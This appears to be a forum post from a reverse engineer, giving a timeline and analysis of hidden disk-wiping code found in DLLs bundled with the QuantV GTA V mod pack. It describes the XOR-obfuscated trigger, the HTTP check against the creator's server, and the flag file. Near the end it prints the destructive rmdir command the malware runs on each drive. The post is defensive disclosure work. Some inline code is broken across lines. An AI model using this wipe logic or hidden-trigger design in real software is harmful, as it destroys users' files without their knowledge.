This topic contains a timeline and rough summary on the findings regarding the ‘QuantV’ disk wiping incident.
QuantV is a third-party ‘graphics mod pack’ for GTA V, being sold on Patreon by its creator (‘Quant’). It bundles a few plugin DLLs to set shader parameters for the ENBSeries shader patching library, and help with making screenshots.
- 2022-09-03T11:48:00Z: I was informed that there was some lore being spread regarding ‘a trojan virus with drive exterminator’ in the native DLLs bundled with QuantV.
- 2022-09-03T11:52:00Z: A buyer sent a copy of a legitimately purchased version of QuantV to me for analysis.
2022-09-03T12:07:00Z: Analysis started on
QuantV.asi, with a file time of 2022-09-01T12:06:34Z, a PE timestamp of 2022-08-29T21:34:35Z, and a SHA256 hash of
2022-09-03T12:14:00Z: Code that contained a list of drive letters and called
system()on some obfuscated (XOR’d) string was discovered. Investigation continued.
- 2022-09-03T12:51:00Z: A tweet informing about this was posted. As the lore was already being spread, this was considered a responsible course of action.
2022-09-03T19:30:00Z: More investigation was performed,
enbhelper.dllwas confirmed as malicious as well, and it appears that a non-functional internet connection will ‘nullify’ the HTTP check at least. The plugin also seems to use/store a flag in some
.inifile, as well as a
x64\data\errorcodes\romanian.txtin the game directory being used as a trigger flag.
2022-09-04T17:13:00Z: A newer build has been released (with file times of September 4, 2022, and a few days newer PE timestamp) which does not include the malicious code in
QuantV.asi, though it still is included in
enbhelper.dll. Regrettably, the author denies having been involved in this, instead going with FUD explanations, looking like a cover-up operation. Notably, however, both versions very much look built from the same source code, and the server checks using the same XOR string library are still in.
QuantV.asihas the HTTP code to fetch status, but
enbhelper.dllwill apply a pending ‘disk wipe’ as well.
QuantV.asicontain the full disk wipe/HTTP check logic. This wasn’t found initially as compiler settings were different.
- It’s unlikely that this was added by a ‘leaker’ as some rumors say. The way this is integrated into the code shows that this was likely done by someone with access to either original or reverse-engineered source code for the .asi file, and the chain I’ve received the sample from corroborates this.
- Antivirus software generally does not pick this up as they rely on a) known signatures or b) behavioral analysis. Since this is a plugin, preemptive behavioral analysis does not apply.
- There is no sign of this version of the .asi executing any other commands than this
- Similarly, there’s no sign of other persistence methods, though there are some file read/writes, and it may be the case the .asi will edit some
.inifiles in the
enbseriesfolder to ‘worm’ in case a pirated copy is spread further.
- The ‘check’ is done using a HTTP API,
the details of which have not been investigated at this timelocated at
http://quantv.xyz/updater, presumable with a POST request of
code=..., involving the
Desaturate Radius=value in
enbseries/enbeffect.fx.ini, which is actually a unique user ID.
The library cpp-httplib is used, with
enb::. The main ‘trigger’ is this API returning (or not returning)
- The command executed amounts to
system(("rmdir /s /q " + drive_letter).c_str());. This will remove files that the user has access to read/write, which could be a lot.
- There have been reports of this being used in the wild, and this existing in pirated copies of an ‘August release’ as well.